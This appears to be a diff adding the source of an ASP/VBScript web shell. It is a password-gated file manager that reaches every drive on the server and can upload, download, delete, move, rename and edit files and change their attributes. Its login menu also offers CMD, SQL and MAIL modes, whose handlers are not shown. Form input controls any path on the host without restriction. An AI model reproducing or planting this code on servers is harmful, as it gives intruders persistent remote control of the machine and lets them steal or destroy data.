+itemPath=addslash(targetPath) & itemName
+
+HtmlHeader("")
+
+select case itemType
+case "ChangeAttributesFile" set item=FSO.GetFile(itemPath)
+case "ChangeAttributesFolder" set item=FSO.GetFolder(itemPath)
+end select
+
+if Request.Form("subcommand")="change" then
+itemAttrib=int(Request.Form("r"))
+itemAttrib=itemAttrib+int(Request.Form("h"))
+itemAttrib=itemAttrib+int(Request.Form("a"))
+itemAttrib=itemAttrib+int(Request.Form("s"))
+on error resume next
+item.Attributes=int(itemAttrib)
+if Err.Number<>0 then Response.Write "<script>alert('Permission denined')</script>" & vbNewLine
+end if
+
+itemAttrib=item.Attributes
+%>
+<b>C</b>hange attributes - "<%=itemName%>"
+<p align=center>
+<form name=frmAttrib method=post action="<%=gURL%>">
+<input type=hidden name=command value="<%=itemType%>">
+<input type=hidden name=subcommand value=change>
+<input type=hidden name=folder value="<%=targetPath%>">
+<input type=hidden name=param value="<%=itemName%>">
+<table>
+<tr>
+<td><input type=checkbox name=r value=1 <%if (itemAttrib and 1)>0 then Response.Write " checked"%>>Read-only</td>
+<td><input type=checkbox name=h value=2 <%if (itemAttrib and 2)>0 then Response.Write " checked"%>>Hidden</td>
+</tr>
+<tr>
+<td><input type=checkbox name=a value=32 <%if (itemAttrib and 32)>0 then Response.Write " checked"%>>Archive</td>
+<td><input type=checkbox name=s value=4 <%if (itemAttrib and 4)>0 then Response.Write " checked"%>>System</td>
+</tr>
+</table><br>
+<input type=button value=OK onclick="frmAttrib.submit()"> <input type=button value=Close onclick="window.close()">
+</form>
+</p>
+<%
+set itemType=nothing
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub OpenFolder()
+if Trim(Request.Form("folder"))="" then 
+if Trim(Request.Form("param"))="" then targetPath=root else targetPath=abspath(Trim(Request.Form("param")))
+else
+targetPath=addslash(Trim(Request.Form("folder"))) & Trim(Request.Form("param"))
+end if
+end sub
+
+'###########################################################################################
+
+sub CreateItem()
+dim itemType,itemName,itemPath 
+itemType=request.form("command")
+itemName=request.form("param")
+itemPath=addslash(targetPath) & itemName
+
+on error resume next
+
+select case itemType
+case "NewFolder"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+FSO.CreateFolder(itemPath)
+if Err.Number<>0 then
+gMsg="Unable to create the folder """ & itemName & """, an error occured..."
+else
+gMsg="Created the folder """ & itemName & """..."
+end if
+else
+gMsg="Unable to create the folder """ & itemName & """, there exists a file or a folder with the same name..."
+end if
+case "NewFile"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+FSO.CreateTextFile(itemPath)
+if Err.Number<>0 then
+gMsg="Unable to create the file """ & itemName & """, an error occured..."
+else
+gMsg="Created the file """ & itemName & """..."
+end if
+else
+gMsg="Unable to create the file """ & itemName & """, there exists a file or a folder with the same name..."
+end if
+end select
+end sub
+
+'###########################################################################################
+
+sub ZipInfo()
+dim path,zip,zipfile,i
+
+path=addslash(targetPath) & Request.Form("param")
+%>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+<title><%=path%></title>
+<style>
+body,td{font-family:Fixedsys}
+a{color:#0000ff}
+</style>
+</head>
+<body bgcolor=#000000 text=#ffffff>
+<p><%=path%>
+<table border=0 cellspacing=1 cellpadding=2 bgcolor=#ff0000>
+<tr bgcolor=#000000>
+<td><font color=#FFFF00>Name</font></td>
+<td align=center><font color=#FFFF00>Size</font></td>
+<td align=center><font color=#FFFF00>Ratio</font></td>
+<td align=center><font color=#FFFF00>Packed</font></td>
+<td align=center><font color=#FFFF00>Modify</font></td>
+<td align=center><font color=#FFFF00>Path</font></td>
+</tr>
+<%
+set zip=new clszip
+zip.ZipLoad(path)
+set zipfile=new clsZipFile
+
+for i=1 to zip.FileCount
+set zipfile=zip.GetFile(i)
+with zipfile
+if not (.IsFolder Or .IsOverall) then
+Response.Write "<tr bgcolor=#000000>" & vbNewLine
+Response.Write " <td>" & .Name & "</td>" & vbNewLine
+Response.Write " <td align=right>" & FormatNumber(.Size,0) & "</td>" & vbNewLine
+Response.Write " <td align=right>" & .Ratio & "</td>" & vbNewLine
+Response.Write " <td align=right>" & FormatNumber(.Packed,0) & "</td>" & vbNewLine
+Response.Write " <td align=center>" & FormatDate(.Modified) & "</td>" & vbNewLine
+Response.Write " <td>" & .Path & "</td>" & vbNewLine
+end if
+end with
+next
+
+set ZipFile=nothing
+set zip=nothing
+%>
+</table>
+</p>
+<%
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub Delete()
+dim i,ndir,nfile,itemName,itemPath
+
+on error resume next
+
+ndir=Request.Form("d").Count
+nfile=Request.Form("f").Count
+
+if (ndir>0) then
+gMsg="<b>D</b>elete folder(s)..."
+for i=1 to ndir
+itemName=Request.Form("d")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.DeleteFolder itemPath,true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then
+gMsg=gMsg & "error"
+else
+gMsg=gMsg & "success"
+end if
+next
+end if
+
+if (nfile>0) then
+if (ndir>0) then gMsg= gMsg & "<p>" & vbNewLine
+gMsg=gMsg & "<b>D</b>elete file(s)..."
+for i=1 to nfile
+itemName=Request.Form("f")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.DeleteFile itemPath,true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then
+gMsg=gMsg & "error"
+else
+gMsg=gMsg & "success"
+end if
+next
+end if
+
+end sub
+
+'###########################################################################################
+
+sub Copy()
+dim i,nfile,ndir,itemName,itemPath
+
+on error resume next
+
+cp_dst=Trim(Request.Form("cp"))
+if cp_dst="" then exit sub
+cp_dst=abspath(cp_dst)
+Session("cp_dst")=cp_dst
+
+if FSO.FolderExists(cp_dst)=false then
+gMsg="<p>Folder not exists" & vbNewLine
+exit sub
+end if
+
+ndir=Request.Form("d").Count
+nfile=Request.Form("f").Count
+
+if (ndir>0) then
+gMsg="<b>C</b>opying folder(s) to """ & cp_dst & """ ..."
+for i=1 to ndir
+itemName=Request.Form("d")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.CopyFolder itemPath,addslash(cp_dst),true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then
+gMsg=gMsg & "error"
+else
+gMsg=gMsg & "success"
+end if
+next
+end if
+
+if (nfile>0) then
+if (ndir>0) then gMsg= gMsg & "<p>" & vbNewLine
+gMsg=gMsg & "<b>C</b>opying file(s) to """ & cp_dst & """ ..."
+for i=1 to nfile
+itemName=Request.Form("f")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.CopyFile itemPath,addslash(cp_dst),true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then gMsg=gMsg & "error" else gMsg=gMsg & "success"
+next
+end if
+
+end sub
+
+'###########################################################################################
+
+sub Move()
+dim i,nfile,ndir,itemName,itemPath
+
+on error resume next
+
+mv_dst=Trim(Request.Form("mv"))
+if mv_dst="" then exit sub
+mv_dst=abspath(mv_dst)
+Session("mv_dst")=mv_dst
+
+if FSO.FolderExists(mv_dst)=false then
+gMsg="<p>Folder not exists" & vbNewLine
+exit sub
+end if
+
+ndir=Request.Form("d").Count
+nfile=Request.Form("f").Count
+
+if (ndir>0) then
+gMsg="<b>M</b>oving folder(s) to """ & mv_dst & """ ..."
+for i=1 to ndir
+itemName=Request.Form("d")(i)
+itemPath=addslash(targetPath) & itemName
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+FSO.MoveFolder itemPath,addslash(mv_dst)
+if Err.Number<>0 then gMsg=gMsg & "error" else gMsg=gMsg & "success"
+set item=nothing
+next
+end if
+
+if (nfile>0) then
+if (ndir>0) then gMsg= gMsg & "<p>" & vbNewLine
+gMsg=gMsg & "<b>M</b>oving file(s) to """ & mv_dst & """ ..."
+for i=1 to nfile
+itemName=Request.Form("f")(i)
+itemPath=addslash(targetPath) & itemName
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+FSO.MoveFile itemPath,addslash(mv_dst)
+if Err.Number<>0 then gMsg=gMsg & "error" else gMsg=gMsg & "success"
+next
+end if
+end sub
+
+'###########################################################################################
+
+sub RenameItem()
+dim item,itemType,itemName,itemPath
+dim param,newName
+
+itemType=request.form("command")
+param=split(request.form("param"),"|")
+itemName=param(0)
+newName=param(1)
+itemPath=addslash(targetPath) & newName
+
+on error resume next
+
+select case itemType
+case "RenameFolder"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+itemPath=addslash(targetPath) & itemName
+set item=FSO.GetFolder(itemPath)
+item.Name=newName
+if Err.Number<>0 then
+gMsg="Unable to rename the folder """ & itemName & """, an error occured..."
+else
+gMsg="Renamed the folder """ & itemName & """ to """ & newName & """..."
+end if
+else
+gMsg="Unable to rename the folder """ & itemName & """, there exists a file or a folder with the new name """ & newName & """..."
+end if
+case "RenameFile"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+itemPath=addslash(targetPath) & itemName
+set item=FSO.GetFile(itemPath)
+item.Name=newName
+if Err.Number<>0 then
+gMsg="Unable to rename the file """ & itemName & """, an error occured..."
+else
+gMsg="Renamed the file """ & itemName & """ to """ & newName & """..."
+end if
+else
+gMsg="Unable to rename the file """ & itemName & """, there exists a file or a folder with the new name """ & newName & """..."
+end if
+end select
+
+set item=nothing
+end sub
+
+'###########################################################################################
+
+sub List()
+dim objFolder,folder,item,intCount,bOpen,ext,count
+if not FSO.FolderExists(targetPath) then
+gMsg="Folder not found"
+else
+on error resume next
+set objFolder=FSO.GetFolder(targetPath)
+if Err.Number<>0 then
+gMsg="Can't open folder"
+else
+intCount=objFolder.SubFolders.Count+objFolder.Files.Count
+if Err.Number<>0 then
+gMsg="Permission denied"
+else
+%>
+<input type=button value=Refresh onclick="Command('Refresh')">
+<input type=button value="New File" onclick="Command('NewFile')">
+<input type=button value="New Folder" onclick="Command('NewFolder')">
+<input type=button value=Upload onclick="frmUpload.max.focus()">
+<input type=button value=Tree onclick="Command('Tree')">
+<%
+bOpen=true
+end if
+end if
+end if
+HtmlQuick()
+if gMsg<>"" then Response.Write "<p>" & gMsg & vbNewLine
+if bOpen then
+count=0
+if intCount>0 then Response.Write "<p>" & objFolder.SubFolders.Count & " subfolder(s)<br>" & vbNewLine & objFolder.Files.Count & " file(s)<br>" & vbNewLine
+if bSize then Response.Write "(" & FormatSize(objFolder.Size) & ")<br>" & vbNewLine
+%>
+<p>
+<table border=1 width=100%>
+<tr>
+<td><b>N</b>ame</td>
+<td align=center><b>S</b>ize</td>
+<td align=center><b>T</b>ype</td>
+<td align=center><b>M</b>odified</td>
+<td><b>A</b>ttributes</td>
+<td><b>A</b>ctions</td>
+<tr>
+<%
+if not isroot(targetPath) then
+%>
+<tr>
+<td><a href="javascript:Command('LevelRoot')" title="Up Root Level">\</a></td>
+<td> </td>
+<td align=center>Root</td>
+<td> </td>
+<td> </td>
+<td> </td>
+</tr>
+<tr>
+<td><a href="javascript:Command('LevelUp')" title="Up One level">..</a></td>
+<td> </td>
+<td align=center>Up</td>
+<td> </td>
+<td> </td>
+<td> </td>
+</tr>
+<%
+end if
+if intCount>0 then
+HtmlJsForm()
+%>
+<form name=theForm method=post action="<%=gURL%>">
+<input type=hidden name=command value="">
+<input type=hidden name=folder value="<%=targetPath%>">
+<%
+for each item in objFolder.SubFolders
+count=count+1
+Response.Write "<tr>" & vbNewLine
+Response.Write " <td><a href=""javascript:Command('OpenFolder',"" & item.Name & "")""" 
+if Len(item.Name)>gMax then Response.Write " title=""" & item.Name & """"
+Response.Write ">" & FormatName(item.Name) & "</a></td>" & vbNewLine
+Response.Write " <td align=right> </td>" & vbNewLine
+Response.Write " <td align=center>DIR</td>" & vbNewLine
+Response.Write " <td align=center>" & FormatDate(item.DateLastModified ) & "</td>" & vbNewLine
+Response.Write " <td>" & GetAttributes(item.Attributes) & "</td>" & vbNewLine
+Response.Write " <td><input type=checkbox name=d value=""" & item.Name & """><input type=button value=Ren onclick=""Command('RenameFolder',"" & item.Name & "")""><input type=button value=Attr onclick=""Command('ChangeAttributesFolder',"" & item.Name & "")""></td>" & vbNewLine
+Response.Write "</tr>" & vbNewLine
+next
+for each item in objFolder.Files
+count=count+1
+Response.Write "<tr>" & vbNewLine
+Response.Write " <td><a href=""javascript:Command('Download',"" & item.Name & "")"""
+ext=FSO.GetExtensionName(addslash(targetPath) & item.Name)
+re.IgnoreCase = true
+re.Pattern = "^" & ext & ",|," & ext & ",|," & ext & "$"
+if re.Test(lnkExt) then
+Response.Write " title=""-> " & Server.Htmlencode(FindLink(addslash(targetPath) & item.Name)) & """"
+elseif Len(item.Name)>gMax then
+Response.Write " title=""" & item.Name & """"
+end if
+
+Response.Write ">" & FormatName(item.Name) & "</td>" & vbNewLine
+Response.Write " <td align=right>" & FormatSize(item.Size) & "</td>" & vbNewLine
+Response.Write " <td align=center>" & item.Type & "</td>" & vbNewLine
+Response.Write " <td align=center>" & FormatDate(item.DateLastModified ) & "</td>" & vbNewLine
+Response.Write " <td>" & GetAttributes(item.Attributes) & "</td>" & vbNewLine
+Response.Write " <td><input type=checkbox name=f value=""" & item.Name & """><input type=button value=Ren onclick=""Command('RenameFile',"" & item.Name & "")""><input type=button value=Attr onclick=""Command('ChangeAttributesFile',"" & item.Name & "")"">"
+
+if re.Test(editExt) then
+Response.Write "<input type=button value=Edit onclick=""Command('Edit',"" & item.Name & "")"">"
+end if
+
+if Lcase(ext)="zip" then
+Response.Write "<input type=button value=Info onclick=""Command('ZipInfo',"" & item.Name & "")"">"
+end if
+
+Response.Write "</td>" & vbNewLine
+Response.Write "</tr>" & vbNewLine
+next
+if count>0 then
+%>
+<tr>
+<td> </td>
+<td> </td>
+<td> </td>
+<td> </td>
+<td> </td>
+<td><input type=checkbox name=allbox title="Select All" onclick="CheckAll()"><input type=button value=Delete title="Delete Selected Item(s)" onclick="DoWork('Delete')"></td>
+</tr>
+<%
+end if
+%>
+</table>
+<%
+if count>1 then
+%>
+<p>
+<table>
+<tr><td><b>C</b>opy selected item(s) to</td><td><input type=text name=cp value="<%=Session("cp_dst")%>" size=50 onkeydown=" if (event.keyCode==13) theForm.cp_bt.click();"> <input type=button id=cp_bt value=Copy onclick="DoWork('Copy')"></td></tr>
+<tr><td><b>M</b>ove selected item(s) to</td><td><input type=text name=mv value="<%=Session("mv_dst")%>" size=50 onkeydown=" if (event.keyCode==13) theForm.mv_bt.click();"> <input type="button" id=mv_bt value=Move onclick="DoWork('Move')"></td></tr>
+</table>
+<%
+end if
+%>
+</form>
+</table>
+<%
+end if
+set objFolder=nothing
+%>
+<p><b>U</b>pload file(s) to "<%=targetPath%>"
+<form name=frmUpload method=post enctype="multipart/form-data" action="<%=gURL%>">
+<input type=hidden name=folder value="<%=targetPath%>">
+Max: <input type=text name=max value=5 size=5> <input type=button value=# onclick="setid()"><br>
+<table>
+<tr>
+<td id=upid>
+</td>
+</tr>
+</table>
+<input type=submit value=Upload>
+</form>
+<script>
+setid();
+function setid() {
+str='<br>';
+if (frmUpload.max.value<=0) frmUpload.max.value=1;
+for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';
+upid.innerHTML=str+'<br>';
+}
+</script>
+<%
+end if
+%>
+<form name=frmFile method=post action="<%=gURL%>">
+<input type=hidden name=command value="">
+<input type=hidden name=param value="">
+<input type=hidden name=folder value="<%=targetPath%>">
+</form>
+<script>frmAddress.param.focus()</script>
+<%
+HtmlJsCommand()
+end sub
+
+'###########################################################################################
+
+sub Upload()
+dim objUpload,f,max,i,name,path,size,success
+
+HtmlHeader("")
+HtmlMode()
+
+set objUpload=New clsUpload
+
+targetPath=objUpload.Fields("folder").Value
+max=objUpload.Fields("max").Value
+
+gMsg= "<b>U</b>pload..." & vbNewLine
+
+for i=1 to max
+name=objUpload.Fields("file" & i).FileName
+size=objUpload.Fields("file" & i).Length
+if (name<>"") and (size>0) then
+gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "
+path=addslash(targetPath) & name
+objUpload.Fields("file" & i).SaveAs path
+if FSO.FileExists(path) then
+on error resume next
+set f=FSO.GetFile(path)
+if IsObject(f) then
+if f.Size=size then success=true else success=false
+end if
+set f=nothing
+end if
+if success then gMsg=gMsg & "success" else gMsg = gMsg & "fail"
+end if
+next
+
+set objUpload=nothing
+
+List()
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub Download()
+dim oStream
+dim szFileName
+szFileName=addslash(Request.Form("folder")) & Request.form("Param")
+if FSO.FileExists(szFileName) then
+set oStream=Server.CreateObject("ADODB.Stream")
+oStream.Type=1
+oStream.Open
+on error resume next
+oStream.LoadFromFile(szFileName)
+if Err.Number=0 then
+Response.AddHeader "Content-Disposition", "attachment; filename=" & FSO.GetFileName(szFileName)
+Response.AddHeader "Content-Length", oStream.Size
+Response.ContentType="bad/type" 'yeu cau ie hien hop thoai save-as
+Response.BinaryWrite oStream.Read
+end if
+oStream.Close
+set oStream=nothing
+end if
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub Logout()
+Session.Abandon
+Response.Redirect gURL
+Destroy()
+end sub
+
+sub Init()
+Session("switch")=false
+set FSO=Server.CreateObject("Scripting.FileSystemObject")
+set re=new regexp
+end sub
+
+sub Destroy()
+set FSO=nothing
+set re=nothing
+Response.End
+end sub
+
+'###########################################################################################
+
+sub Secure()
+if (Session("allow")=1) then exit sub
+if (gPassword="") then
+Session("allow")=1
+Session("mode")=0
+exit sub
+end if
+if (Request.Form("command")="Login") then
+if Request.Form("password")=gPassword then
+Session("allow")=1
+Session("mode")=CInt(Request.Form("mode"))
+exit sub
+end if
+end if
+
+HtmlHeader("")
+%>
+<form name=frmLogin method=post action="<%=gURL%>">
+<table>
+<tr>
+<td><b>M</b>ode:</td>
+<td>
+<select name=mode>
+<option value=0 selected>FILE
+<option value=1>CMD
+<option value=2>SQL
+<option value=3>MAIL
+</select>
+</td>
+</tr>
+<tr>
+<td><b>P</b>assword:</td>
+<td><input type=password name=password></td>
+</tr>
+<tr>
+<td colspan=2><input type=submit name=command value=Login></td>
+</tr>
+</table>
+</form>
+<script>frmLogin.password.focus()</script>
+<%
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub HtmlJsForm()
+%>
+<script>
+function CheckAll() {
+var fmobj=document.theForm;
+for (var i=0; i<fmobj.elements.length;i++) {
+var e=fmobj.elements<i>;
+if ((e.name!='allbox') && (e.type=='checkbox') && (!e.disabled)) {
+e.checked=fmobj.allbox.checked;
+}
+}
+if (fmobj.allbox.checked) {
+fmobj.allbox.title='Clear All';
+} else {
+fmobj.allbox.title='Select All';
+}
+}
+
+function DoWork(cmd) {
+var s;
+var fmobj=document.theForm;
+var total=0;
+for (var i=0; i<fmobj.elements.length; i++) {
+var e=fmobj.elements<i>;
+if ((e.name!='allbox') && (e.type=='checkbox') && (e.checked)) total++;
+}
+
+if (total<1) return;
+
+s=(total>1)?'s':'';
+
+switch (cmd) {
+case "Delete":
+if (!confirm('Are you sure to delete ' + total + ' selected item' + s + ' ?')) return;
+break;
+case "Move":
+var mv=fmobj.mv.value;
+var re1=/^\s*[A-Z]{1}:[^\"\*\?\<\>\|]*\s*$/gi;
+var re2=/^\s*:{1}[^\s]+/gi;
+if (mv=='') return;
+if ( re1.test(mv) || re2.test(mv) ){
+if (!confirm('Are you sure to move ' + total + ' selected item' + s + ' to "' + mv + '" ?')) return;
+} else {
+alert('Invalid path name !');
+return;
+}
+break;
+case "Copy":
+var cp=fmobj.cp.value;
+var re1=/^\s*[A-Z]{1}:[^\"\*\?\<\>\|]*\s*$/gi;
+var re2=/^\s*:{1}[^\s]+/gi;
+if (cp=='') return;
+if ( re1.test(cp) || re2.test(cp) ) {
+} else {
+alert('Invalid path name !');
+return;
+}
+break;
+default:
+return;
+}
+
+fmobj.command.value=cmd;
+fmobj.submit();
+}
+</script>
+<%
+end sub
+
+'###########################################################################################
+
+sub HtmlJsCommand()
+%>
+<script>
+function openWin(winName, urlLoc, w, h, showStatus, isViewer) {
+l = (screen.availWidth - w)/2;
+t = (screen.availHeight - h)/2;
+features = "toolbar=no"; // yes|no 
+features += ",location=no"; // yes|no 
+features += ",directories=no"; // yes|no 
+features += ",status=" + (showStatus?"yes":"no"); // yes|no 
+features += ",menubar=no"; // yes|no 
+features += ",scrollbars=" + (isViewer?"yes":"no"); // auto|yes|no 
+features += ",resizable=" + (isViewer?"yes":"no"); // yes|no 
+features += ",dependent"; // close the parent, close the popup, omit if you want otherwise 
+features += ",height=" + h;
+features += ",width=" + w;
+features += ",left=" + l;
+features += ",top=" + t;
+winName = winName.replace(/[^a-z]/gi,"_");
+return window.open(urlLoc,winName,features);
+} 
+
+function createPage (theWin, cmd, param){
+frmFile.target = theWin.name;
+frmFile.command.value = cmd;
+frmFile.param.value = param;
+frmFile.submit();
+}
+
+function CheckName(str) {
+var re;
+re = /[\\/:*?"<>|]/gi;
+if (re.test(str)) return false; 
+else return true;
+} 
+
+function Command(cmd, param) {
+var str;
+var someWin;
+switch (cmd) {
+case "Tree":
+str = prompt("Please enter a name for the folder to tree", frmFile.folder.value);
+if (!str) return;
+var re1=/^\s*[A-Z]{1}:[^\"\*\?\<\>\|]*\s*$/gi;
+var re2=/^\s*:{1}[^\s]+/gi;
+if (re1.test(str) || re2.test(str)) {
+var winName=cmd + document.forms.frmFile.param.value;
+param=str;
+document.forms.frmFile.param.value=param;
+winName=winName.replace(/[^a-z]/gi,"_");
+someWin=window.open("", winName, "toolbar=yes,location=no,directories=no,status=yes,menubar=yes,scrollbars=yes,resizable=yes");
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+}
+else {
+alert('Invalid path name !');
+return;
+}
+break;
+case "NewFile":
+str = prompt("Please enter a name for the new file", "New File");
+if(!str) return;
+else if (!CheckName(str)) {alert("File name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = str;
+break;
+case "NewFolder":
+str = prompt("Please enter a name for the new folder", "New Folder");
+if(!str) return;
+else if (!CheckName(str)) {alert("Folder name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = str;
+break;
+case "RenameFile":
+str = prompt("Please enter the new name for the file", param);
+if (!str || (str==param)) return;
+else if (!CheckName(str)) {alert("File name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = param + "|" + str;
+break;
+case "RenameFolder":
+str = prompt("Please enter the new name for the folder", param);
+if (!str || (str==param)) return;
+else if (!CheckName(str)) {alert("Folder name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = param + "|" + str;
+break;
+case "Edit":
+str = frmFile.folder.value + param;
+someWin = openWin(cmd + str, "", 600, 440, true, false);
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+break;
+case "ChangeAttributesFile":
+case "ChangeAttributesFolder":
+str = frmFile.folder.value + param;
+someWin = openWin(cmd + str, "", 300, 160, true, false);
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+break;
+case "ZipInfo":
+var winName=cmd + document.forms.frmFile.folder.value + param;
+winName=winName.replace(/[^a-z]/gi,"_");
+someWin=window.open("", winName, "toolbar=yes,location=no,directories=no,status=yes,menubar=yes,scrollbars=yes,resizable=yes");
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+break
+default:
+frmFile.param.value = param;
+}
+frmFile.target = "";
+frmFile.command.value = cmd
+frmFile.submit(); 
+}
+</script>
+<%
+end sub
+
+sub HtmlJsEditor()
+%>
+<script>
+function EditorCommand (cmd) {
+switch (cmd) {
+case "WordWrap":
+if (frmFile.wrap.checked) frmFile.content.wrap="soft";
+else frmFile.content.wrap="off";
+frmFile.content.focus();
+break;
+case "Reload":
+frmFile.reset();
+break;
+case "Save":
+frmFile.subcommand.value = "Save";
+frmFile.submit();
+break;
+case "SaveAs":
+var str, oldname;
+oldname = frmFile.param.value;
+str = prompt("Save the file as :", oldname);
+if (!str || str==oldname) return;
+frmFile.param.value = str;
+frmFile.subcommand.value = "SaveAs";
+frmFile.submit();
+break;
+}
+}
+</script>
+<%
+end sub
+
+sub HtmlQuick()
+%>
+<form name=frmQuick method=post action="<%=gURL%>">
+<input type=hidden name=command value=OpenFolder>
+<select name=param onchange="frmQuick.submit()">
+<%
+dim dc,d,dName,dType
+set dc=FSO.Drives
+for each d in dc
+dName=d.DriveLetter&":\"
+select case d.DriveType
+case 0 dType="Unknown"
+case 1 if d.driveletter="A" then dType="?" else dType="?"
+dType=dType&" Floppy" 'maybe wrong
+case 2 dType="HDD " & FormatSize(d.TotalSize)
+case 3 dType="Network"
+case 4
+dType="CD-ROM"
+if not d.IsReady then dType=dType & " - not ready"
+case 5
+dType="RAM Disk"
+end select
+Response.Write "<option value=""" & dName & """"
+if d.DriveLetter=Ucase(Left(targetPath,1)) then Response.Write " selected"
+Response.Write ">" & dName& " (" & dType & ")" & vbNewLine
+next
+set dc=nothing
+%>
+</select>
+</form>
+<form name=frmAddress method=post action="<%=gURL%>">
+<input type=hidden name=command value=OpenFolder>
+<b>A</b>ddress: <input type=text name=param value="<%=targetPath%>" size=90> <input type=submit value=Go>
+</form>
+<%
+end sub
+
+sub HtmlMode()
+%>
+<table>
+<tr>
+<td>
+<form name=frmChangeMode method=post action="<%=gURL%>">
+<input type=hidden name=command value=ChangeMode>
+<select name=mode onchange="frmChangeMode.submit()">
+<option value=0<%if Session("mode")=0 then Response.Write " selected"%>>FILE
+<option value=1<%if Session("mode")=1 then Response.Write " selected"%>>CMD
+<option value=2<%if Session("mode")=2 then Response.Write " selected"%>>SQL
+<option value=3<%if Session("mode")=3 then Response.Write " selected"%>>MAIL
+</select>
+</form>
+</td>
+<%
+if gPassword<>"" then
+%>
+<td>
+<form name=frmLogout method=post action="<%=gURL%>">
+<input type=submit name=command value=Logout>
+</form>
+</td>
+<%
+end if
+%>
+</tr>
+</table>
+<%
+end sub
+
+'###########################################################################################
+
+sub HtmlHeader(strTitle)
+%>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+<title><%=strTitle%></title>
+<style>
+select,input{font-family:Verdana;font-size:9pt}
+</style>
+</head>
+<body>
+<%
+end sub
+
+'###########################################################################################
+
+sub HtmlFooter()
+%>
+</body>
+</html>
+<%
+end sub
+
+'###########################################################################################
+
+function abspath(path)
+if left(path,1)=":" then abspath=Server.MapPath(mid(path,2)) else abspath=FSO.GetAbsolutePathName(path)
+end function
+
+'###########################################################################################
+
+function addslash(path)
+if right(path,1)="\" then addslash=path else addslash=path & "\"
+end function
+
+'###########################################################################################
+
+function findroot(path)
+dim f
+
+set f=FSO.GetFolder(path)
+
+if f.IsRootFolder then
+else
+do until f.IsRootFolder
+set f=f.ParentFolder
+loop
+end if
+findroot=f.Path
+set f=nothing
+end function
+
+'###########################################################################################
+
+function isroot(path)
+dim f
+set f=FSO.GetFolder(path)
+isroot=f.IsRootFolder
+set f=nothing
+end function
+
+'###########################################################################################
+
+Function FindLink(szFileName)
+Dim WshShell, oLink
+
+Set WshShell=Server.CreateObject("WScript.Shell")
+Set oLink=WshShell.CreateShortcut(szFileName)
+
+FindLink=oLink.TargetPath
+
+Set oLink=Nothing
+Set WshShell=Nothing
+End Function
+
+'###########################################################################################
+
+Function FormatSize(intSize)
+If (intSize < 1024) Then
+FormatSize = intSize & " B"
+ElseIf (intSize < 1024*1024) Then
+FormatSize = FormatNumber(intSize/1024,2) & " KB"
+ElseIf (intSize < 1024*1024*1024) Then
+FormatSize = FormatNumber(intSize/(1024*1024),2) & " MB"
+Else
+FormatSize = FormatNumber(intSize/(1024*1024*1024),2) & " GB"
+End If
+End Function
+
+'###########################################################################################
+
+Function FormatName(szName)
+FormatName = szName
+If gMax > 5 And Len(szName) > gMax Then FormatName = Left(szName,gMax-2) & "..."
+End Function
+
+'###########################################################################################
+
+function FormatDate(strDate)
+dim int12HourPart,strAMPM
+int12HourPart=DatePart("h",strDate) mod 12
+if int12HourPart=0 then int12HourPart=12
+if DatePart("h",strDate)>=12 then strAMPM="PM" else strAMPM="AM"
+FormatDate=Right("0"&DatePart("d",strDate),2) & "/" & Right("0"&DatePart("m",strDate),2) & "/" & DatePart("yyyy",strDate) & " " & Right("0"&int12HourPart,2) & ":" & Right("0"&DatePart("n",strDate),2) & ":" & Right("0"&DatePart("s",strDate),2) & " " & strAMPM
+end function
+
+'###########################################################################################
+
+Function GetAttributes(intAttr)
+Dim strAttributes
+strAttributes=""
+If (intAttr And 1) > 0 Then strAttributes = "R"
+If (intAttr And 2) > 0 Then strAttributes=strAttributes & "H"
+If (intAttr And 4) > 0 Then strAttributes=strAttributes & "S"
+If (intAttr And 32) > 0 Then strAttributes=strAttributes & "A"
+If (intAttr And 2048) > 0 Then strAttributes=strAttributes & "C"
+if strAttributes="" then strAttributes=" "
+GetAttributes=strAttributes
+End Function
+
+'###########################################################################################
+
+Class clsField
+Public Name
+Private mstrPath
+Public FileDir
+Public FileExt
+Public FileName
+Public ContentType
+Public Value
+Public BinaryData
+Public Length
+Private mstrText
+
+Public Property Get BLOB()
+BLOB = BinaryData
+End Property
+
+Public Function BinaryAsText()
+Dim lbinBytes
+Dim lobjRs
+If Length = 0 Then Exit Function
+If LenB(BinaryData) = 0 Then Exit Function
+
+If Not Len(mstrText) = 0 Then
+BinaryAsText = mstrText
+Exit Function
+End If
